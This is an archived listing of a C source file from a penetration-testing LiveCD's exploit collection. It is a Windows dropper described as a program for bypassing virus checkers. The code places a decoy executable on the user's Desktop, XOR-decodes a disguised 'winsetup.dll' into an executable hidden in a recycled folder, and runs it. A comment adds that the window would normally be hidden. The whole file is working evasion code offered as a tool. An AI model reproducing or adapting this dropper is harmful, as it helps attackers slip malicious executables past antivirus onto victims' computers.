home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / setup.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  87 lines
  1. /* Setup program for bypassing virus checkers */ 
  2.  
  3. #include <sys/types.h> 
  4. #include <sys/stat.h> 
  5. #include <fcntl.h> 
  6. #include <stdlib.h> 
  7. #include <dir.h> 
  8. #include <io.h> 
  9. #include <stdio.h> 
  10. #include <windows.h> 
  11.  
  12. #define SOURCE_FILE ".\\winsetup.dll" 
  13. #define DEST_FILE "\\recycled\\eicar.com" 
  14. #define DECOY_FILE ".\\decoy.exe" 
  15. #define DECOY_DIR_KEY
  16. "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" 
  17. #define DECOY_DIR_VAL "Desktop" 
  18. #define BUFSIZE 4096 
  19. #define XORME 25 
  20.  
  21. int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR
  22. lpszCmdLine, int nCmdShow) 
  24. int sourcefile, destfile, bytesin,i; 
  25. char buffer[BUFSIZE],szDirName[256],szDecoyDir[512]; 
  26. long lerror; 
  27. HKEY regkey; 
  28. DWORD ValSize = sizeof(szDirName); /* How annoying */ 
  29.  
  30. /* Find out where the desktop is so we can put the decoy there */ 
  31. if((lerror =
  32. RegOpenKeyEx(HKEY_CURRENT_USER,DECOY_DIR_KEY,0,KEY_QUERY_VALUE,®key))
  33. != ERROR_SUCCESS) 
  34.     { 
  35.     exit(0); 
  36.     } 
  37. if((lerror =
  38. RegQueryValueEx(regkey,DECOY_DIR_VAL,0,NULL,&szDirName[0],&ValSize)) !=
  39. ERROR_SUCCESS) 
  40.     { 
  41.     exit(0); 
  42.     } 
  43. RegCloseKey(regkey); 
  44.  
  45.  
  46. /* Expand the dir name on the off chance it contains ENV vars */ 
  47. ExpandEnvironmentStrings(&szDirName[0],&szDecoyDir[0],sizeof(szDecoyDir)); 
  48. rename(DECOY_FILE,strcat(szDecoyDir,DECOY_FILE)); 
  49.  
  50.  
  51. /* It doesn't matter what mkdir's return code is. It'll make the dir if
  52. it 
  53. doesn't exist or fail of it does */ 
  54. mkdir("\\recycled"); 
  55.  
  56.  
  57. /* Prepare to "decrypt" the infected executable */ 
  58. if((sourcefile = open(SOURCE_FILE,O_RDONLY | O_BINARY)) == -1) 
  59.     { 
  60.     exit(0); 
  61.     } 
  62. if((destfile = open(DEST_FILE,O_WRONLY | O_CREAT | O_EXCL | O_BINARY,
  63. S_IREAD | S_IWRITE)) == -1) 
  64.     { 
  65.     exit(0); 
  66.     } 
  67.  
  68. /* "Decrypt" it */ 
  69. while((bytesin = read(sourcefile,&buffer[0],BUFSIZE)) != 0) 
  70.     { 
  71.     for(i=0;i<bytesin;i++) 
  72.         { 
  73.         buffer[i] ^= XORME; 
  74.         } 
  75.     write(destfile,&buffer[0],bytesin); 
  76.     } 
  77.  
  78. close(sourcefile); 
  79. close(destfile); 
  80.  
  81. /* Run the infected executable. You would normally use SW_HIDE here. */ 
  82. WinExec(DEST_FILE,SW_SHOWNORMAL); 
  83. return(0); 
  85.  
  86.  
  87.